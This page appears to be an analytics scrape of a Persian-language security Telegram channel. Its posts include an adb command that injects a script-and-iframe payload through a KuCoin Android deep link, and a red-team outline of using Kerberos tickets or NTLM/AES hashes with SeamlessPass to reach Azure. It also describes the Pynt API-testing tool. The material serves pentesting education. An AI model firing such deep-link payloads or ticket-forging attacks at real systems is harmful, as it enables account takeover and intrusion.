Security Analysis
- Offensive Security (Red Teaming / PenTesting) - BlueTeam (OperationSec, TreatHunting, DFIR) - Reverse Engineering / Malware Analysis - Web Security - Cryptography - Steganography - Forensics
إظهار المزيد- المشتركون
- التغطية البريدية
- ER - نسبة المشاركة
جاري تحميل البيانات...
جاري تحميل البيانات...
داداش یه کم صبر کن میدونیم امنیت کار نیستی ولی اوسینت بلدی :)) بخدا ما هم دست داریم هم سرچ زدن رو خوب بلدیم😂 #شاپرک #تقلب #HADES @securation
adb shell am start -d 'kucoin:///link?data=\<script\>document.write\(\"\<iframe src=https://www.example.com style=position:fixed;top:0;left:0;width:100%;height:100%;border:none;\>\<\/iframe\>\"\)\;\</script\>'
📎 BlogPost
@Securation
#Androidدر صورت نبود Credential به شکل Clear-text، ما به سه شکل میتوانیم با استفاده از این تکنیک و ابزار SeamlessPass به دسترسی برسیم: در حالت اول ما TGT یا KRBTGT را دارا هستیم که با Golden,Diamond,و ازین قبیل حملات، اقدام به تولید TGS میکنیم و ادامه ماجرا. در حالت دوم ما NTML Hash و یا AES key را دارا هستیم، که اقدام به دریافت TGT و TGS میکنیم و ادامه ماجرا. و در حالت سوم ما NTLM Hash و AES Key اکانت AZUREADSSOACC که پیش تر صحبت شد را دارا هستیم، که میتوان TGS تولید کند و بدون هیچ تعاملی با DC، در Azure احراز هویت کند.در ادامه با دسترسی به محیط مربوطه با استفاده از ROADTools و AADInternals میتوان اقدام به Enumeration و Exploitation کرد. #RedTeam #Azure #Cloud @securation
Author: Abdulrahman Nour TL;DR We have created SeamlessPass, a tool that utilizes Microsoft’s Seamless SSO feature to acquire access tokens for Microsoft 365 services by leveraging on-premises Active Directory Kerberos tickets. SeamlessPass is particularly useful in red team scenarios where cleartext passwords are unavailable, but...
Pynt به ما این امکان را میدهد تا تستهای امنیتی را به صورت خودکار بر روی API ها اجرا کنید. این تستها بر اساس سناریوهای واقعی حمله مانند تزریق کد و حملات scraping اجرا میشوند و از این طریق به شناسایی و رفع آسیبپذیریها قبل از تولید کمک میکنند.Context-Aware Testing:
Pynt از تحلیلهای مختلف برای درک بهتر کارکردهای خاص API ها و نحوه تعامل آنها با فرآیندهای تجاری استفاده میکند. این قابلیت کمک میکند تا آسیبپذیریهای خاصی که ممکن است در تستهای استاندارد نادیده گرفته شوند، شناسایی شوند.Zero False Positives:
یکی از مواردی که ادعا کرده این ابزار دقت بالای آن در تشخیص آسیبپذیریها بدون ایجاد خطا است.پشتیبانی از OWASP Top 10 و لیستهای امنیتی دیگر:
با استفاده از استانداردهای OWASP و سایر استاندارد های امنیتی،اقدام به بررسی میکند.ادغام با ابزارهای توسعه و CI/CD:
این پلتفرم به راحتی با ابزارهای محبوب توسعه API مانند Postman و BurpSuite و سیستمهای CI/CD ادغام میشود، که به توسعهدهندگان امکان میدهد امنیت API ها را بهصورت مستقیم در جریان توسعه بررسی کنند.ارائه گزارشهای کامل و Remediation Paths:
گزارشهای کاملی از آسیبپذیریها همراه با پیشنهادات رفع مشکل و تیکتهای خودکار ارائه میدهد که این فرآیند را برای تیمهای امنیتی و توسعهدهندگان سادهتر میکند.پشتیبانی از انواع مختلف API ها:
از انواع مختلف API ها شامل REST، SOAP، و GraphQL پشتیبانی میکند، و با توجه به نیازهای خاص هر نوع API، تستهای مربوطه را انجام میدهد. در آخر میتوان در نسخه های trial و تجاری از آن استفاده کرد.#AppSec #APISecurity @securation
Pynt offers dynamic API security testing for developers and testers to identify and fix vulnerabilities during the development lifecycle.
تسمح خطتك الحالية بتحليلات لما لا يزيد عن 5 قنوات. للحصول على المزيد، يُرجى اختيار خطة مختلفة.